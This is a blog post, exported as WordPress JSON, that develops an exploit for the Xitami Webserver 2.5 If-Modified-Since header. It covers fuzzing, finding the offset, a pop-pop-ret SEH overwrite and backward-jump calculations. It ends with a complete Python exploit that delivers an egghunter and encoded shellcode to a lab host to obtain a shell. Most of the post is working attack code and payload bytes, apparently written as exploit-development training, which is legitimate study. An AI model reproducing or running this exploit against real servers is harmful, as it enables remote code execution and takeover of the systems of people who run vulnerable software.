{"id":34,"date":"2021-02-10T10:04:09","date_gmt":"2021-02-10T10:04:09","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=34"},"modified":"2021-02-10T10:04:46","modified_gmt":"2021-02-10T10:04:46","slug":"34","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/34\/","title":{"rendered":"Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter"},"content":{"rendered":"\n

Fuzzing<\/h2>\n\n\n\n

get HTTP request<\/p>\n\n\n\n

GET \/ HTTP\/1.1Host: 192.168.1.9User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMTCache-Control: max-age=0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Create a fuzzing script with boo-gen using HTTP requestpython boo-gen.py get.txt
Vulnerable:If-Modified-Since: Wed, <fuzzing-payload><\/p>\n\n\n\n

s_string(“If-Modified-Since: Sat,”, name=”If-Modified-Since”, fuzzable = False)s_delim(” “, name=”space-10”, fuzzable = False)s_string(“15 Jun 2019 01:36:09 GMT”, name=”If-Modified-Since-Value”)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

Offset<\/h2>\n\n\n\n
#!\/usr\/bin\/python
import socket, sys, os

ip = “192.168.1.9”port = 80
offset = “A”*350
buffer = offset + nseh + seh
request = “”request += “GET \/ HTTP\/1.1\\r\\n”request += “Host: 192.168.1.9\\r\\n”request += “User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0\\r\\n”request += “Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\\r\\n”request += “Accept-Language: en-US,en;q=0.5\\r\\n”request += “Accept-Encoding: gzip, deflate\\r\\n”request += “Connection: close\\r\\n”request += “Upgrade-Insecure-Requests: 1\\r\\n”request += “If-Modified-Since: Thu, ” + buffer + “\\r\\n\\r\\n”
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((ip,port))s.send(request)s.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

SEH overwrite<\/h2>\n\n\n\n
\"\"\/<\/figure>\n\n\n\n

POP-POP-RET<\/h2>\n\n\n\n

!mona seh<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Address starts with null characterIf we only take 44F584 part of 0044F584, D characters we add after seh will make it 4444F584 <\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

If we remove D characters, the correct address will be found<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Remember normal SEH structure for the exploit<\/p>\n\n\n\n

[Junk][nSEH][SEH][Nop-Shellcode]
nSEH = the jump to the shellcodeSEH = a reference to a pop pop ret
find offsetfind pop-pop-retshort jump with nsehcreate shellcode
offset = “A”*304nseh = “\\xcc\\xcc\\xcc\\xcc”seh = “\\x57\\xf8\\x44” # pop-pop-ret 0x0044f857nops = “\\x90” *24shellcode = “”<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

But we don’t have many place so we’ll go backwards
50 jmp back = \\xeb\\xcc<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Calculations:<\/h2>\n\n\n\n

JMP 50 bytes back<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

We need meaningful calculations. There are some corruptions in A buffer.<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

Start of A buffer = 6FE80″A” buffer start after the corruptions = 6FEE0eip (at the end of As) = 6FF7E<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

So there is enough space more than 50 bytes.
Let’s JMP 50 back and the new address right after \\xeb\\xcc is 0x6FF7E<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

The calculation for space before egghunterStart of A buffer = 6fe80new address after JMP 50 back = 6ff7e<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

So the offset will be like following:
offset = “A”*254 + egghunter + “A”*(304-254-32)
Before we do JMP 50 backwards with our calculations:<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

After JMP 50 backwards, the address becomes 6ff7e which is the start address of egghunter as can be seen in memory dump<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

We’re all set. Let’s create the shellcode and get a shell
<\/p>\n\n\n\n

Final Exploit and Shell<\/h2>\n\n\n\n
#!\/usr\/bin\/python
import socket, sys, os

ip = “192.168.1.9”port = 80

egghunter = “\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x6b\\x61\\x6c\\x69\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7”
#offset = “A”* 254 + egghunter + “A”*(304-254-32)offset = “A”*254 + egghunter + “A”*(304-254-32)nseh = “\\xeb\\xcc\\x90\\x90″seh = “\\x57\\xf8\\x44” # pop-pop-ret 0x0044f857
egg = “kalikali”shellcode =  “”shellcode += “\\x89\\xe3\\xdb\\xc9\\xd9\\x73\\xf4\\x58\\x50\\x59\\x49\\x49″shellcode += “\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43″shellcode += “\\x43\\x43\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30″shellcode += “\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30″shellcode += “\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49″shellcode += “\\x39\\x6c\\x79\\x78\\x6d\\x52\\x45\\x50\\x73\\x30\\x77\\x70″shellcode += “\\x43\\x50\\x6d\\x59\\x6d\\x35\\x30\\x31\\x6b\\x70\\x31\\x74″shellcode += “\\x6e\\x6b\\x62\\x70\\x36\\x50\\x6c\\x4b\\x76\\x32\\x54\\x4c”shellcode += “\\x6c\\x4b\\x73\\x62\\x46\\x74\\x6c\\x4b\\x70\\x72\\x74\\x68″shellcode += “\\x56\\x6f\\x38\\x37\\x61\\x5a\\x67\\x56\\x35\\x61\\x59\\x6f”shellcode += “\\x4c\\x6c\\x37\\x4c\\x75\\x31\\x61\\x6c\\x36\\x62\\x44\\x6c”shellcode += “\\x65\\x70\\x6b\\x71\\x4a\\x6f\\x54\\x4d\\x36\\x61\\x5a\\x67″shellcode += “\\x39\\x72\\x6a\\x52\\x33\\x62\\x70\\x57\\x6e\\x6b\\x62\\x72″shellcode += “\\x52\\x30\\x6e\\x6b\\x73\\x7a\\x35\\x6c\\x6c\\x4b\\x32\\x6c”shellcode += “\\x47\\x61\\x34\\x38\\x5a\\x43\\x52\\x68\\x55\\x51\\x48\\x51″shellcode += “\\x66\\x31\\x4c\\x4b\\x50\\x59\\x77\\x50\\x37\\x71\\x68\\x53″shellcode += “\\x4e\\x6b\\x70\\x49\\x52\\x38\\x39\\x73\\x36\\x5a\\x63\\x79″shellcode += “\\x4c\\x4b\\x45\\x64\\x6e\\x6b\\x57\\x71\\x4a\\x76\\x74\\x71″shellcode += “\\x79\\x6f\\x6e\\x4c\\x59\\x51\\x7a\\x6f\\x76\\x6d\\x56\\x61″shellcode += “\\x4a\\x67\\x57\\x48\\x4b\\x50\\x34\\x35\\x7a\\x56\\x44\\x43″shellcode += “\\x31\\x6d\\x6a\\x58\\x45\\x6b\\x71\\x6d\\x67\\x54\\x43\\x45″shellcode += “\\x48\\x64\\x71\\x48\\x4e\\x6b\\x52\\x78\\x67\\x54\\x43\\x31″shellcode += “\\x58\\x53\\x33\\x56\\x6c\\x4b\\x44\\x4c\\x32\\x6b\\x4c\\x4b”shellcode += “\\x36\\x38\\x35\\x4c\\x73\\x31\\x58\\x53\\x4e\\x6b\\x55\\x54″shellcode += “\\x6c\\x4b\\x45\\x51\\x7a\\x70\\x4e\\x69\\x62\\x64\\x54\\x64″shellcode += “\\x64\\x64\\x63\\x6b\\x53\\x6b\\x75\\x31\\x33\\x69\\x73\\x6a”shellcode += “\\x33\\x61\\x69\\x6f\\x59\\x70\\x61\\x4f\\x61\\x4f\\x72\\x7a”shellcode += “\\x6c\\x4b\\x54\\x52\\x48\\x6b\\x4c\\x4d\\x53\\x6d\\x52\\x48″shellcode += “\\x45\\x63\\x37\\x42\\x65\\x50\\x35\\x50\\x65\\x38\\x50\\x77″shellcode += “\\x44\\x33\\x50\\x32\\x31\\x4f\\x46\\x34\\x43\\x58\\x30\\x4c”shellcode += “\\x31\\x67\\x61\\x36\\x36\\x67\\x6b\\x4f\\x4e\\x35\\x4e\\x58″shellcode += “\\x6c\\x50\\x67\\x71\\x55\\x50\\x65\\x50\\x36\\x49\\x49\\x54″shellcode += “\\x62\\x74\\x36\\x30\\x35\\x38\\x67\\x59\\x6b\\x30\\x52\\x4b”shellcode += “\\x73\\x30\\x79\\x6f\\x6a\\x75\\x66\\x30\\x36\\x30\\x36\\x30″shellcode += “\\x76\\x30\\x63\\x70\\x66\\x30\\x37\\x30\\x52\\x70\\x55\\x38″shellcode += “\\x49\\x7a\\x36\\x6f\\x39\\x4f\\x69\\x70\\x69\\x6f\\x4e\\x35″shellcode += “\\x4c\\x57\\x32\\x4a\\x66\\x65\\x50\\x68\\x59\\x50\\x4f\\x58″shellcode += “\\x65\\x51\\x57\\x78\\x63\\x58\\x47\\x72\\x77\\x70\\x71\\x32″shellcode += “\\x6c\\x78\\x6c\\x49\\x4d\\x36\\x51\\x7a\\x76\\x70\\x62\\x76″shellcode += “\\x70\\x57\\x70\\x68\\x6d\\x49\\x79\\x35\\x72\\x54\\x50\\x61″shellcode += “\\x39\\x6f\\x58\\x55\\x6c\\x45\\x59\\x50\\x42\\x54\\x64\\x4c”shellcode += “\\x79\\x6f\\x42\\x6e\\x44\\x48\\x72\\x55\\x78\\x6c\\x70\\x68″shellcode += “\\x6c\\x30\\x6e\\x55\\x4e\\x42\\x76\\x36\\x69\\x6f\\x78\\x55″shellcode += “\\x62\\x48\\x63\\x53\\x32\\x4d\\x45\\x34\\x47\\x70\\x4d\\x59″shellcode += “\\x38\\x63\\x73\\x67\\x42\\x77\\x72\\x77\\x64\\x71\\x6b\\x46″shellcode += “\\x30\\x6a\\x37\\x62\\x36\\x39\\x50\\x56\\x6a\\x42\\x39\\x6d”shellcode += “\\x71\\x76\\x5a\\x67\\x53\\x74\\x37\\x54\\x67\\x4c\\x77\\x71″shellcode += “\\x73\\x31\\x6c\\x4d\\x62\\x64\\x54\\x64\\x76\\x70\\x6b\\x76″shellcode += “\\x63\\x30\\x61\\x54\\x36\\x34\\x52\\x70\\x31\\x46\\x70\\x56″shellcode += “\\x63\\x66\\x72\\x66\\x43\\x66\\x50\\x4e\\x32\\x76\\x66\\x36″shellcode += “\\x66\\x33\\x36\\x36\\x65\\x38\\x34\\x39\\x48\\x4c\\x35\\x6f”shellcode += “\\x6e\\x66\\x4b\\x4f\\x7a\\x75\\x6d\\x59\\x6d\\x30\\x62\\x6e”shellcode += “\\x61\\x46\\x42\\x66\\x69\\x6f\\x76\\x50\\x63\\x58\\x56\\x68″shellcode += “\\x4f\\x77\\x37\\x6d\\x75\\x30\\x49\\x6f\\x4b\\x65\\x6f\\x4b”shellcode += “\\x58\\x70\\x6c\\x75\\x4d\\x72\\x76\\x36\\x72\\x48\\x39\\x36″shellcode += “\\x6a\\x35\\x4f\\x4d\\x4d\\x4d\\x6b\\x4f\\x4b\\x65\\x37\\x4c”shellcode += “\\x44\\x46\\x61\\x6c\\x34\\x4a\\x6d\\x50\\x4b\\x4b\\x49\\x70″shellcode += “\\x64\\x35\\x34\\x45\\x6f\\x4b\\x31\\x57\\x46\\x73\\x51\\x62″shellcode += “\\x72\\x4f\\x52\\x4a\\x57\\x70\\x71\\x43\\x59\\x6f\\x4b\\x65″shellcode += “\\x41\\x41”
stage1 = offset + nseh + sehstage2 = egg + shellcode
request = “”request += “GET \/ HTTP\/1.1\\r\\n”request += “Host: 192.168.1.9” + stage2 + “\\r\\n”request += “User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0\\r\\n”request += “Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\\r\\n”request += “Accept-Language: en-US,en;q=0.5\\r\\n”request += “Accept-Encoding: gzip, deflate\\r\\n”request += “Connection: close\\r\\n”request += “Upgrade-Insecure-Requests: 1\\r\\n”request += “If-Modified-Since: Thu, ” + stage1 + “\\r\\n\\r\\n”

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((ip,port))s.send(request)s.close()<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\"\"\/<\/figure>\n","protected":false},"excerpt":{"rendered":"

Fuzzing get HTTP request GET \/ HTTP\/1.1Host: 192.168.1.9User-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMTCache-Control: max-age=0 Create a fuzzing script with boo-gen using HTTP requestpython boo-gen.py get.txtVulnerable:If-Modified-Since: Wed, <fuzzing-payload> s_string(“If-Modified-Since: Sat,”, name=”If-Modified-Since”, fuzzable = False)s_delim(” “, name=”space-10”, fuzzable = False)s_string(“15 Jun 2019 01:36:09… Continue reading Exploit Development: Xitami Webserver 2.5 – SEH + Egghunter<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[18],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/34"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=34"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/34\/revisions"}],"predecessor-version":[{"id":36,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/34\/revisions\/36"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=34"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=34"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=34"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}